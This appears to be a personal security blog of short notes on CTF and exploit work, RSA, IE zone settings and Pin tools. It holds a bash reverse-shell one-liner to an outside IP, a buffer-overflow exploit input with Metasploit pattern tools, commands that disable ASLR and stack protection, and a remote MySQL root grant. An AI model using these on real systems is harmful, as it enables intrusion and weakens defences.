open tcp connection

/bin/bash -i >& /dev/tcp/10.16.66.15/3389 0>&1

Posted in Uncategorized | Leave a comment

shellcode

perl -e 'print "\xee\xfa\xff\xbf"x270;' > exploit
./vul.a < exploit

/opt/metasploit/apps/pro/msf3/tools# ./pattern_create.rb 0x100
/opt/metasploit/apps/pro/msf3/tools# ./pattern_offset.rb xxxx

Posted in Uncategorized | Leave a comment

RSA

(1) Choose two distinct, sufficiently large primes p and q.
(2) Compute n = pq.
(3) Compute f(n) = (p-1)(q-1), and keep p and q strictly secret so that nobody else learns them.
(4) Find a number e that is coprime to f(n), with 1 < e < f(n).
(5) Compute d such that de ≡ 1 mod f(n). This can also be written as d ≡ e^(-1) mod f(n).
A note on notation: ≡ is the congruence symbol from number theory. The left side of the formula must be congruent to the right side, i.e. both sides give the same result under the modulus. Clearly, whatever value f(n) takes, 1 mod f(n) on the right side equals 1, so the product of d and e on the left side must also reduce to 1 under the modulus. Computing d means finding the value that makes this congruence hold.
(6) The public key is KU = (e, n), the private key is KR = (d, n).
(7) To encrypt, first transform the plaintext into an integer M between 0 and n-1. If the plaintext is long, split it into suitably sized groups first and then transform each group. Let the ciphertext be C; the encryption process is:
(8) The decryption process is:
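A worked run of steps (1) to (8) in Python, added here as an example rather than taken from the post. The primes 10007 and 10009 are constructed toy values (far too small for real use), the function names are my own, and encryption and decryption use the standard C = M^e mod n and M = C^d mod n; step (7)'s splitting of a long plaintext into blocks is carried through as well.

```python
def is_prime(n: int) -> bool:
    """Step (1) check by trial division: enough for the toy primes used here."""
    return n > 1 and all(n % i for i in range(2, int(n ** 0.5) + 1))


def modinv(e: int, phi: int) -> int:
    """Step (5): extended Euclid gives d with d*e = 1 (mod phi)."""
    r0, r1, t0, t1 = phi, e, 0, 1
    while r1:
        q = r0 // r1
        r0, r1 = r1, r0 - q * r1
        t0, t1 = t1, t0 - q * t1
    if r0 != 1:                      # gcd(e, f(n)) != 1: step (4) was violated
        raise ValueError("e and f(n) are not coprime")
    return t0 % phi


def keygen(p: int, q: int, e: int = 65537):
    """Steps (1)-(6): returns public key KU=(e, n) and private key KR=(d, n)."""
    assert p != q and is_prime(p) and is_prime(q)
    n = p * q
    phi = (p - 1) * (q - 1)          # f(n); p, q and f(n) must stay secret
    assert 1 < e < phi
    return (e, n), (modinv(e, phi), n)


def block_size(n: int) -> int:
    """Largest k such that any k-byte block maps to an integer M in [0, n-1]."""
    k = 1
    while 256 ** (k + 1) < n:
        k += 1
    return k


def encrypt(msg: bytes, pub) -> list:
    """Step (7): split into k-byte blocks, M = int(block), C = M^e mod n."""
    e, n = pub
    k = block_size(n)
    return [pow(int.from_bytes(msg[i:i + k], "big"), e, n)
            for i in range(0, len(msg), k)]


def decrypt(blocks: list, priv, length: int) -> bytes:
    """Step (8): M = C^d mod n per block; length restores the short last block (real RSA pads with OAEP instead)."""
    d, n = priv
    k = block_size(n)
    out = bytearray()
    for i, c in enumerate(blocks):
        size = k if i < len(blocks) - 1 else length - k * (len(blocks) - 1)
        out += pow(c, d, n).to_bytes(size, "big")
    return bytes(out)


# Constructed toy primes and sample plaintext so the example runs stand-alone.
SAMPLE_P, SAMPLE_Q = 10007, 10009
SAMPLE_MSG = b"RSA splits long text"
```

With these primes n exceeds 256^3, so three plaintext bytes fit in one block; with the textbook pair p=61, q=53 only one byte does.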

Posted in Uncategorized | Leave a comment

Connecting to MySQL from a remote machine

mysql -u root -p
mysql> GRANT ALL ON *.* TO root@'hostname' IDENTIFIED BY 'password';

mysql> flush privileges;
Posted in Uncategorized | Leave a comment

Internet Setting Zones

   Value    Setting
   ------------------------------
   0        My Computer
   1        Local Intranet Zone
   2        Trusted sites Zone
   3        Internet Zone
   4        Restricted Sites Zone

Value    Setting
   ----------------------------------------------------------------------------------
   1001     ActiveX controls and plug-ins: Download signed ActiveX controls
   1004     ActiveX controls and plug-ins: Download unsigned ActiveX controls
   1200     ActiveX controls and plug-ins: Run ActiveX controls and plug-ins
   1201     ActiveX controls and plug-ins: Initialize and script ActiveX controls not marked as safe for scripting
   1206     Miscellaneous: Allow scripting of Internet Explorer Web browser control ^
   1207     Reserved #
   1208     ActiveX controls and plug-ins: Allow previously unused ActiveX controls to run without prompt ^
   1209     ActiveX controls and plug-ins: Allow Scriptlets
   120A     ActiveX controls and plug-ins: Override Per-Site (domain-based) ActiveX restrictions
   120B     ActiveX controls and plug-ins: Override Per-Site (domain-based) ActiveX restrictions
   1400     Scripting: Active scripting
   1402     Scripting: Scripting of Java applets
   1405     ActiveX controls and plug-ins: Script ActiveX controls marked as safe for scripting
   1406     Miscellaneous: Access data sources across domains
   1407     Scripting: Allow Programmatic clipboard access
   1408     Reserved #
   1409     Scripting: Enable XSS Filter
   1601     Miscellaneous: Submit non-encrypted form data
   1604     Downloads: Font download
   1605     Run Java #
   1606     Miscellaneous: Userdata persistence ^
   1607     Miscellaneous: Navigate sub-frames across different domains
   1608     Miscellaneous: Allow META REFRESH * ^
   1609     Miscellaneous: Display mixed content *
   160A     Miscellaneous: Include local directory path when uploading files to a server ^
   1800     Miscellaneous: Installation of desktop items
   1802     Miscellaneous: Drag and drop or copy and paste files
   1803     Downloads: File Download ^
   1804     Miscellaneous: Launching programs and files in an IFRAME
   1805     Launching programs and files in webview #
   1806     Miscellaneous: Launching applications and unsafe files
   1807     Reserved ** #
   1808     Reserved ** #
   1809     Miscellaneous: Use Pop-up Blocker ** ^
   180A     Reserved # 
   180B     Reserved #
   180C     Reserved #
   180D     Reserved #
   180E     Allow OpenSearch queries in Windows Explorer #
   180F     Allow previewing and custom thumbnails of OpenSearch query results in Windows Explorer #
   1A00     User Authentication: Logon
   1A02     Allow persistent cookies that are stored on your computer #
   1A03     Allow per-session cookies (not stored) #
   1A04     Miscellaneous: Don't prompt for client certificate selection when no certificates or only one certificate exists * ^
   1A05     Allow 3rd party persistent cookies *
   1A06     Allow 3rd party session cookies *
   1A10     Privacy Settings *
   1C00     Java permissions #
   1E05     Miscellaneous: Software channel permissions
   1F00     Reserved ** #
   2000     ActiveX controls and plug-ins: Binary and script behaviors
   2001     .NET Framework-reliant components: Run components signed with Authenticode
   2004     .NET Framework-reliant components: Run components not signed with Authenticode
   2007     .NET Framework-Reliant Components: Permissions for Components with Manifests
   2100     Miscellaneous: Open files based on content, not file extension ** ^
   2101     Miscellaneous: Web sites in less privileged web content zone can navigate into this zone **
   2102     Miscellaneous: Allow script initiated windows without size or position constraints ** ^
   2103     Scripting: Allow status bar updates via script ^
   2104     Miscellaneous: Allow websites to open windows without address or status bars ^
   2105     Scripting: Allow websites to prompt for information using scripted windows ^
   2200     Downloads: Automatic prompting for file downloads ** ^
   2201     ActiveX controls and plug-ins: Automatic prompting for ActiveX controls ** ^
   2300     Miscellaneous: Allow web pages to use restricted protocols for active content **
   2301     Miscellaneous: Use Phishing Filter ^
   2400     .NET Framework: XAML browser applications
   2401     .NET Framework: XPS documents
   2402     .NET Framework: Loose XAML
   2500     Turn on Protected Mode [Vista only setting] #
   2600     Enable .NET Framework setup ^
   2702     ActiveX controls and plug-ins: Allow ActiveX Filtering
   2708     Miscellaneous: Allow dragging of content between domains into the same window
   2709     Miscellaneous: Allow dragging of content between domains into separate windows
   270B     Miscellaneous: Render legacy filters
   270C     ActiveX Controls and plug-ins: Run Antimalware software on ActiveX controls

   {AEBA21FA-782A-4A90-978D-B72164C80120}   First Party Cookie *
   {A8A88C49-5EB2-4990-A1A2-0876022C854F}   Third Party Cookie *

*  indicates an Internet Explorer 6 or later setting
** indicates a Windows XP Service Pack 2 or later setting
#  indicates a setting that is not displayed in the user interface in Internet Explorer
^  indicates a setting that only has two options, enabled or disabled
Posted in Uncategorized | Leave a comment

after bctf

uncompyle2-master: converts the .pyc back to .py

GDBserver: debug the program with gdb via IDA

Posted in Uncategorized | Leave a comment

Pin tools: getting the API name for an instruction address

PIN_LockClient();                      // image/routine lookups must run under the client lock
IMG img = IMG_FindByAddress(ins_ip);   // image (executable or DLL) containing the instruction
string imgName = (IMG_Valid(img) ? IMG_Name(img) : "InvalidImg");
RTN rtn = RTN_FindByAddress(ins_ip);   // routine (e.g. exported API) containing the instruction
string newName = (RTN_Valid(rtn) ? RTN_Name(rtn) : "InvalidRtn");
PIN_UnlockClient();

Posted in Computers and Internet | Leave a comment

Disabling ASLR in Linux

The control file is /proc/sys/kernel/randomize_va_space.

echo 0 > /proc/sys/kernel/randomize_va_space

cat /proc/sys/kernel/randomize_va_space

Without a root shell, the same via sudo (exec-shield is a Red Hat-specific knob that is absent on other kernels):

echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
echo 0 | sudo tee /proc/sys/kernel/exec-shield

Compiler switches:

-fno-stack-protector -z execstack -mpreferred-stack-boundary=2
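An added check (not from the post) for verifying what the sysctl above actually buys you: it reads randomize_va_space, reads the per-process personality flag that tools such as setarch -R and gdb use to switch randomisation off regardless of the sysctl, and then spawns fresh interpreters to see whether a new anonymous mapping really lands at different addresses. It assumes CPython 3 on Linux; the function names are my own.

```python
import subprocess
import sys

SYSCTL = "/proc/sys/kernel/randomize_va_space"
ADDR_NO_RANDOMIZE = 0x0040000        # personality(2) flag set by setarch -R and gdb

# Child prints the address of a fresh anonymous mapping (assumed: CPython 3 on Linux).
CHILD = ("import ctypes, mmap; m = mmap.mmap(-1, 4096); "
         "print(ctypes.addressof(ctypes.c_char.from_buffer(m)))")


def aslr_level():
    """Sysctl from the post: 0 = off, 1 = stack/mmap/vdso randomised, 2 = brk heap too; None if unreadable."""
    try:
        with open(SYSCTL) as f:
            return int(f.read().strip())
    except (OSError, ValueError):
        return None


def randomization_disabled_for_process() -> bool:
    """The per-process flag overrides the sysctl and is inherited by children,
    so a '2' in the sysctl does not guarantee a randomised layout."""
    try:
        with open("/proc/self/personality") as f:
            return bool(int(f.read().strip(), 16) & ADDR_NO_RANDOMIZE)
    except (OSError, ValueError):
        return False


def mmap_base_varies(runs: int = 5):
    """Spawn fresh interpreters and compare mmap addresses; None if spawning fails."""
    seen = set()
    for _ in range(runs):
        try:
            out = subprocess.run([sys.executable, "-c", CHILD], capture_output=True,
                                 text=True, check=True, timeout=30).stdout
        except (OSError, subprocess.SubprocessError):
            return None
        seen.add(int(out))
    return len(seen) > 1


def expected_to_vary(level, per_process_disabled: bool):
    """What the sysctl and the personality flag together predict; None if unknown."""
    if level is None:
        return None
    return level != 0 and not per_process_disabled


def consistent(level, per_process_disabled: bool, varies) -> bool:
    """True when observed behaviour matches the configuration (or either side is unknown)."""
    expected = expected_to_vary(level, per_process_disabled)
    return expected is None or varies is None or expected == varies
```

Running it inside gdb or under setarch -R shows the mapping staying put even with the sysctl at 2, which is the case the sysctl alone cannot tell you about.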

Posted in Uncategorized | Leave a comment

Flash32_11_8_800_94

106879E0

Posted in Uncategorized | Leave a comment

Using Visual Studio 2010 to build a PIN tool

Preprocessor Definitions

TARGET_IA32;HOST_IA32;TARGET_WINDOWS;USING_XED

 

Compiler options:
/MT /EHs- /EHa- /wd4530 /DTARGET_WINDOWS /DBIGARRAY_MULTIPLIER=1
/DUSING_XED /D_CRT_SECURE_NO_DEPRECATE /D_SECURE_SCL=0 /nologo /DTARGET_IA32 /DHOST_IA32

 

Linker options:
/DLL /EXPORT:main /NODEFAULTLIB /NOLOGO /ENTRY:Ptrace_DllMainCRTStartup@12 ntdll-32.lib libxed.lib pin.lib pinvm.lib libcmt.lib libcpmt.lib /DEBUG

 

C:\Pin\extras\components\include;C:\Pin\extras\xed2-ia32\include;C:\Pin\source\include\pin\gen;C:\Pin\source\include;c:\Pin\source\include\pin\;$(IncludePath)
C:\Pin\ia32\lib-ext;C:\Pin\ia32\lib;C:\Pin\extras\xed2-ia32\lib;$(LibraryPath)

 

Posted in Uncategorized | Leave a comment